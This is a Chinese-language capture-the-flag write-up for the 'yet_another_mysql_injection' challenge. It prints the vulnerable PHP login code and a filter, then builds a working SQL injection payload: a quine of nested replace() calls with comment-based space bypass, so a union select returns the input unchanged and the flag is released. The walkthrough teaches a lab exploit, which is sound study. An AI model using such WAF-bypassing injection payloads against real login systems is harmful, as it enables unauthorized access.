CTFHUB 2021-第五空间 yet_another_mysql_injection
CTFHUB 2021-第五空间 yet_another_mysql_injection
源码如下:
include_once("lib.php");
function alertMes($mes,$url){
die("");
}
function checkSql($s) {
if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){ //②
alertMes('hacker', 'index.php');
}
}
if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
$username=$_POST['username'];
$password=$_POST['password'];
if ($username !== 'admin') {
alertMes('only admin can login', 'index.php');//username===admin
}
checkSql($password);
$sql="SELECT password FROM users WHERE username='admin' and password='$password';"; //①
$user_result=mysqli_query($con,$sql);
$row = mysqli_fetch_array($user_result);
if (!$row) {
alertMes("something wrong",'index.php');
}
if ($row['password'] === $password) {//这个是关键③
die($FLAG);
} else {
alertMes("wrong password",'index.php');
}
}
if(isset($_GET['source'])){
show_source(__FILE__);
die;
}
?>
分析源码点①得出账号一定是admin,只有password可控,是注入点。
分析②得出有waf。
分析点③这个if判断了从数据库中查到的密码是否和用户输入的是一样的,只有完全一致才会得到FLAG。
看到这里,发现盲注,报错,联合,堆叠都行不通。
关键代码:
if ($row['password'] === $password) {
die($FLAG);
} else {
alertMes("wrong password",'index.php');
这个if判断了从数据库中查到的密码是否和用户输入的是一样的,只有完全一致才会得到FLAG,那这岂不是只能输入正确密码才能得到FLAG???
进入正题
通过分析发现只有输入正确的密码才能得到FLAG,但是这张表其实是一张空表,所以爆破密码这条路走不通。
那就只有一个办法,就是构造一个输入输出完全一致的语句,就可以绕过限制并得到FLAG
注入的payload
1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
看到这里是不是一脸懵逼,别着急,慢慢分析
1.首先先了解一下replace()函数
- replace(object,search,replace)
- 把object对象中出现的的search全部替换成replace
看个例子
select replace(".",char(46),"."); # char(46)就是.
+---------------------------+
| replace(".",char(46),".") |
+---------------------------+
| . |
+---------------------------+
2.如何让输入输出一致呢?
上面的例子用.替换object里的.,最终返回了一个.,那如果我们将object写成replace(".",char(46),".")会有什么变化呢?
mysql> select replace( 'replace(".",char(46),".")' , char(46) , '.' );
+---------------------------------------------------+
| replace('replace(".",char(46),".")',char(46),'.') |
+---------------------------------------------------+
| replace(".",char(46),".") |
+---------------------------------------------------+
结果返回了replace(".",char(46),".")这个东西,即object不变,但还是没有达到我们预期的效果怎么办,这时候我们将第三个参数也改成replace(".",char(46),".")
mysql> select replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');
+---------------------------------------------------------------------------+
| replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")') | #单引号
+---------------------------------------------------------------------------+
| replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")") | #双引号
+---------------------------------------------------------------------------+
有点类似套娃的感觉。先分析一下这段sql语句
select replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');
replace函数的三个参数分别是
'replace(".",char(46),".")'
char(46)
'replace(".",char(46),".")'
这个语句的意思是用第三个参数替换第一个参数里面的.并返回替换后的第一个参数
这样就明白了为什么返回的是replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")")
那么这样是否就达到了我们输入输出一致的目的呢,答案肯定是还没有。细心点就会发现输入与输出在单双引号上有细微的不同
3.解决单双引号不同的问题
有了上面的经验后,我们这样考虑,如果先将双引号替换成单引号是不是就可以解决引号不同的问题了。实现方法无非就是在套一层replace
mysql> select replace(replace('"."',char(34),char(39)),char(46),"."); # 先执行内层replace
+--------------------------------------------------------+
| replace(replace('"."',char(34),char(39)),char(46),".") |
+--------------------------------------------------------+
| '.' |
+--------------------------------------------------------+
1 row in set (0.00 sec)
这样就可以将我们的双引号替换成单引号,此时我们继续沿用上面的思路,构造输入输出相同的语句
mysql> select replace(
replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),
char(46),
'replace(replace(".",char(34),char(39)),char(46),".")'
);
+------------------------------------------------------------------------------------------+
replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")')
+------------------------------------------------------------------------------------------+
replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")')
+------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
Quine基本形式:
replace(replace(‘str’,char(34),char(39)),char(46),‘str’)
先将str里的双引号替换成单引号,再用str替换str里的.
str基本形式(可以理解成上面的".")
replace(replace(".",char(34),char(39)),char(46),".")
完整的Quine就是Quine基本形式+str基本形式
回过头来再看我们的payload
1'/**/union/**/select/**/replace(replace('',char(34),char(39)),char(46),'')#
可理解成我们的Quine的基本形式
1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#
这个就是我们str的基本形式
先将str里的双引号替换成单引号
1'/**/union/**/select/**/replace(replace('.',char(34),char(39)),char(46),'.')#
最终通过来回替换的形式达到了我们的目的
现在就明白了为什么我们的内层replace里面有一个单独的’’
Quine形式多变,修改的时候切记str对应也要修改
【还是有疑惑】个人感觉,之所以要构造一个输入输出完全一致的语句,是因为联合查询创造了一个新数据。